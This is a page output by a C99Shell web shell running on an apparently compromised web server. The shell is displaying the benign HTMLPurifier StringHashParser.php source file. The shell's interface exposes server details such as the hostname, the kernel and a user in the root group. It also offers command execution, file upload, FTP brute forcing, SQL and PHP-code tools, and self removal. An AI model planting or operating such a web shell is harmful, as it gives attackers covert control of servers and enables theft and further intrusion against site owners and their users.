!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/ezyang/htmlpurifier/library/HTMLPurifier/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     StringHashParser.php (3.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Parses string hash files. File format is as such:
 *
 *      DefaultKeyValue
 *      KEY: Value
 *      KEY2: Value2
 *      --MULTILINE-KEY--
 *      Multiline
 *      value.
 *
 * Which would output something similar to:
 *
 *      array(
 *          'ID' => 'DefaultKeyValue',
 *          'KEY' => 'Value',
 *          'KEY2' => 'Value2',
 *          'MULTILINE-KEY' => "Multiline\nvalue.\n",
 *      )
 *
 * We use this as an easy to use file-format for configuration schema
 * files, but the class itself is usage agnostic.
 *
 * You can use ---- to forcibly terminate parsing of a single string-hash;
 * this marker is used in multi string-hashes to delimit boundaries.
 */
class HTMLPurifier_StringHashParser
{

    
/**
     * @type string
     */
    
public $default 'ID';

    
/**
     * Parses a file that contains a single string-hash.
     * @param string $file
     * @return array
     */
    
public function parseFile($file)
    {
        if (!
file_exists($file)) {
            return 
false;
        }
        
$fh fopen($file'r');
        if (!
$fh) {
            return 
false;
        }
        
$ret $this->parseHandle($fh);
        
fclose($fh);
        return 
$ret;
    }

    
/**
     * Parses a file that contains multiple string-hashes delimited by '----'
     * @param string $file
     * @return array
     */
    
public function parseMultiFile($file)
    {
        if (!
file_exists($file)) {
            return 
false;
        }
        
$ret = array();
        
$fh fopen($file'r');
        if (!
$fh) {
            return 
false;
        }
        while (!
feof($fh)) {
            
$ret[] = $this->parseHandle($fh);
        }
        
fclose($fh);
        return 
$ret;
    }

    
/**
     * Internal parser that acepts a file handle.
     * @note While it's possible to simulate in-memory parsing by using
     *       custom stream wrappers, if such a use-case arises we should
     *       factor out the file handle into its own class.
     * @param resource $fh File handle with pointer at start of valid string-hash
     *            block.
     * @return array
     */
    
protected function parseHandle($fh)
    {
        
$state   false;
        
$single  false;
        
$ret     = array();
        do {
            
$line fgets($fh);
            if (
$line === false) {
                break;
            }
            
$line rtrim($line"\n\r");
            if (!
$state && $line === '') {
                continue;
            }
            if (
$line === '----') {
                break;
            }
            if (
strncmp('--#'$line3) === 0) {
                
// Comment
                
continue;
            } elseif (
strncmp('--'$line2) === 0) {
                
// Multiline declaration
                
$state trim($line'- ');
                if (!isset(
$ret[$state])) {
                    
$ret[$state] = '';
                }
                continue;
            } elseif (!
$state) {
                
$single true;
                if (
strpos($line':') !== false) {
                    
// Single-line declaration
                    
list($state$line) = explode(':'$line2);
                    
$line trim($line);
                } else {
                    
// Use default declaration
                    
$state  $this->default;
                }
            }
            if (
$single) {
                
$ret[$state] = $line;
                
$single false;
                
$state  false;
            } else {
                
$ret[$state] .= "$line\n";
            }
        } while (!
feof($fh));
        return 
$ret;
    }
}

// vim: et sw=4 sts=4

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--